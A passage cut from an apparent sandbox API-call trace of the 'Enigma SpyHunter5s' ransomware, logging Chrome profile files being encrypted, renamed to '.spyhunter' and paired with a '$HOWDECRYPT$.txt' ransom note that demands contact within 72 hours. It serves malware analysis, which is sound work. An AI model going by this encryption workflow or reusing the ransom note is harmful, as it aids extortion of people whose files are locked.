lpNumberOfBytesWritten=0x25cec3c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec3c*=0x30, lpOverlapped=0x0) returned 1 [0156.525] CloseHandle (hObject=0x9c) returned 1 [0156.525] GetProcessHeap () returned 0x2c0000 [0156.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.525] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts.spyhunter") returned 99 [0156.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts.spyhunter")) returned 1 [0156.526] GetProcessHeap () returned 0x2c0000 [0156.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.526] GetProcessHeap () returned 0x2c0000 [0156.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.526] GetProcessHeap () returned 0x2c0000 [0156.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44c28 | out: hHeap=0x2c0000) returned 1 [0156.527] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec78 | out: pbBuffer=0x25cec78) returned 1 [0156.527] GetProcessHeap () returned 0x2c0000 [0156.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.527] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec70*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec70*=0x30) returned 1 [0156.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.527] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal") returned 100 [0156.527] StrStrW (lpFirst="QuotaManager-journal", lpSrch=".txt") returned 0x0 [0156.528] GetProcessHeap () returned 0x2c0000 [0156.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.528] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec34*=0x0, lpOverlapped=0x0) returned 1 [0156.528] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.528] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cec34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec34*=0x0, lpOverlapped=0x0) returned 1 [0156.528] GetProcessHeap () returned 0x2c0000 [0156.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.528] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.528] WriteFile (in: hFile=0x9c, lpBuffer=0x25cec74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec34, lpOverlapped=0x0 | out: lpBuffer=0x25cec74*, lpNumberOfBytesWritten=0x25cec34*=0x4, lpOverlapped=0x0) returned 1 [0156.529] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec34, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec34*=0x30, lpOverlapped=0x0) returned 1 [0156.529] CloseHandle (hObject=0x9c) returned 1 [0156.529] GetProcessHeap () returned 0x2c0000 [0156.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.529] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal.spyhunter") returned 110 [0156.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager-journal.spyhunter")) returned 1 [0156.530] GetProcessHeap () returned 0x2c0000 [0156.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.530] GetProcessHeap () returned 0x2c0000 [0156.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.530] GetProcessHeap () returned 0x2c0000 [0156.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a178 | out: hHeap=0x2c0000) returned 1 [0156.530] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec78 | out: pbBuffer=0x25cec78) returned 1 [0156.531] GetProcessHeap () returned 0x2c0000 [0156.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.531] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec70*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec70*=0x30) returned 1 [0156.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.531] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager") returned 92 [0156.531] StrStrW (lpFirst="QuotaManager", lpSrch=".txt") returned 0x0 [0156.531] GetProcessHeap () returned 0x2c0000 [0156.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.531] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec34*=0x2800, lpOverlapped=0x0) returned 1 [0156.584] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.584] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cec34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec34*=0x2800, lpOverlapped=0x0) returned 1 [0156.584] GetProcessHeap () returned 0x2c0000 [0156.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.584] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.585] WriteFile (in: hFile=0x9c, lpBuffer=0x25cec74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec34, lpOverlapped=0x0 | out: lpBuffer=0x25cec74*, lpNumberOfBytesWritten=0x25cec34*=0x4, lpOverlapped=0x0) returned 1 [0156.625] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec34, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec34*=0x30, lpOverlapped=0x0) returned 1 [0156.625] CloseHandle (hObject=0x9c) returned 1 [0156.626] GetProcessHeap () returned 0x2c0000 [0156.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.626] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager.spyhunter") returned 102 [0156.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager.spyhunter")) returned 1 [0156.627] GetProcessHeap () returned 0x2c0000 [0156.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.627] GetProcessHeap () returned 0x2c0000 [0156.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.628] GetProcessHeap () returned 0x2c0000 [0156.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b358 | out: hHeap=0x2c0000) returned 1 [0156.628] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec70 | out: pbBuffer=0x25cec70) returned 1 [0156.628] GetProcessHeap () returned 0x2c0000 [0156.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.628] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec68*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec68*=0x30) returned 1 [0156.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History") returned 87 [0156.628] StrStrW (lpFirst="History", lpSrch=".txt") returned 0x0 [0156.628] GetProcessHeap () returned 0x2c0000 [0156.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.629] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cec2c*=0x2800, lpOverlapped=0x0) returned 1 [0156.817] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.817] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cec2c*=0x2800, lpOverlapped=0x0) returned 1 [0156.817] GetProcessHeap () returned 0x2c0000 [0156.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.818] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.818] WriteFile (in: hFile=0x178, lpBuffer=0x25cec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec2c, lpOverlapped=0x0 | out: lpBuffer=0x25cec6c*, lpNumberOfBytesWritten=0x25cec2c*=0x4, lpOverlapped=0x0) returned 1 [0156.818] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec2c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec2c*=0x30, lpOverlapped=0x0) returned 1 [0156.818] CloseHandle (hObject=0x178) returned 1 [0156.827] GetProcessHeap () returned 0x2c0000 [0156.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.827] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History.spyhunter") returned 97 [0156.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history.spyhunter")) returned 1 [0156.828] GetProcessHeap () returned 0x2c0000 [0156.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.828] GetProcessHeap () returned 0x2c0000 [0156.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.828] GetProcessHeap () returned 0x2c0000 [0156.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38c58 | out: hHeap=0x2c0000) returned 1 [0156.828] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec70 | out: pbBuffer=0x25cec70) returned 1 [0156.828] GetProcessHeap () returned 0x2c0000 [0156.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.829] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec68*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec68*=0x30) returned 1 [0156.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.861] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json") returned 171 [0156.861] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0156.861] GetProcessHeap () returned 0x2c0000 [0156.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.862] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec2c*=0x2800, lpOverlapped=0x0) returned 1 [0157.018] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.019] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec2c*=0x2800, lpOverlapped=0x0) returned 1 [0157.019] GetProcessHeap () returned 0x2c0000 [0157.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.019] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.019] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec2c, lpOverlapped=0x0 | out: lpBuffer=0x25cec6c*, lpNumberOfBytesWritten=0x25cec2c*=0x4, lpOverlapped=0x0) returned 1 [0157.019] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec2c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec2c*=0x30, lpOverlapped=0x0) returned 1 [0157.019] CloseHandle (hObject=0xa0) returned 1 [0157.019] GetProcessHeap () returned 0x2c0000 [0157.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0157.019] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.spyhunter") returned 181 [0157.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.spyhunter")) returned 1 [0157.026] GetProcessHeap () returned 0x2c0000 [0157.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0157.027] GetProcessHeap () returned 0x2c0000 [0157.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.027] GetProcessHeap () returned 0x2c0000 [0157.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f25cb0 | out: hHeap=0x2c0000) returned 1 [0157.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.028] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.028] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb9f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cecc8, lpOverlapped=0x0 | out: lpBuffer=0x25ceb9f*, lpNumberOfBytesWritten=0x25cecc8*=0x127, lpOverlapped=0x0) returned 1 [0157.029] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.029] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cecc8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cecc8*=0x2ac, lpOverlapped=0x0) returned 1 [0157.029] CloseHandle (hObject=0xa0) returned 1 [0157.030] GetProcessHeap () returned 0x2c0000 [0157.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb9200 | out: hHeap=0x2c0000) returned 1 [0157.030] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec68 | out: pbBuffer=0x25cec68) returned 1 [0157.030] GetProcessHeap () returned 0x2c0000 [0157.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.030] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec60*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec60*=0x30) returned 1 [0157.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.031] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json") returned 164 [0157.031] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.031] GetProcessHeap () returned 0x2c0000 [0157.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.031] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cec24*=0x2800, lpOverlapped=0x0) returned 1 [0157.168] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.168] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cec24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cec24*=0x2800, lpOverlapped=0x0) returned 1 [0157.168] GetProcessHeap () returned 0x2c0000 [0157.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.168] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.168] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec24, lpOverlapped=0x0 | out: lpBuffer=0x25cec64*, lpNumberOfBytesWritten=0x25cec24*=0x4, lpOverlapped=0x0) returned 1 [0157.168] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec24, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec24*=0x30, lpOverlapped=0x0) returned 1 [0157.169] CloseHandle (hObject=0xa0) returned 1 [0157.169] GetProcessHeap () returned 0x2c0000 [0157.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0157.169] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.spyhunter") returned 174 [0157.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 